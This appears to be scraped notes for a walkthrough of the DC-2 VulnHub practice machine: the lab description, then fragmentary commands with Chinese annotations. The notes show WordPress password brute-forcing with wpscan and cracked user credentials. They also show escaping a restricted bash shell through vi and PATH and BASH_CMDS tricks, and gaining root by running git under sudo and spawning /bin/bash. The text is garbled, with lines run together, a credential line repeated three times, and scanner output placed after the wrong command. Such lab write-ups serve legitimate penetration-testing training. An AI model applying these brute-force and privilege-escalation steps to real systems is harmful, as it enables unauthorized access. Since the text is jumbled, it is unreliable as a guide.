https://www.vulnhub.com/?q=dc-2
Name: DC: 2
Date release: 22 Mar 2019
Author: DCAU
Series: DC
Web page: http://www.five86.com/dc-2.html

DESCRIPTION
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it's designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag.
And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts, is the final flag.
For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.
I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

--enumerate //列举枚举u  //用户-P  //指定用于暴力破解的口令字典

wpscan --url http://dc-2 -e -P password

[SUCCESS] - jerry / adipiscing[SUCCESS] - tom / parturient

nikto -host dc-2

[SUCCESS] - jerry / adipiscing[SUCCESS] - tom / parturient

vi:set shell=/bin/bash:shellexport PATH=/bin:/usr/bin:$PATHexport SHELL=/bin/bash:$SHELL

BASH_CMDS[a]=/bin/sh;aexport PATH=$PATH:/bin/export PATH=$PATH:/usr/bin

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

[SUCCESS] - jerry / adipiscing[SUCCESS] - tom / parturient

Good to see that you've made it this far - but you're not home yet.You still need to get the final flag (the only flag that really counts!!!).No hints here - you're on your own now.  :-)Go on - git outta here!!!!

https://www.cnblogs.com/zaqzzz/p/12075132.html

法1: sudo git help config    !/bin/bash或者！'sh'完成提权法2: sudo git  -p help    !/bin/bash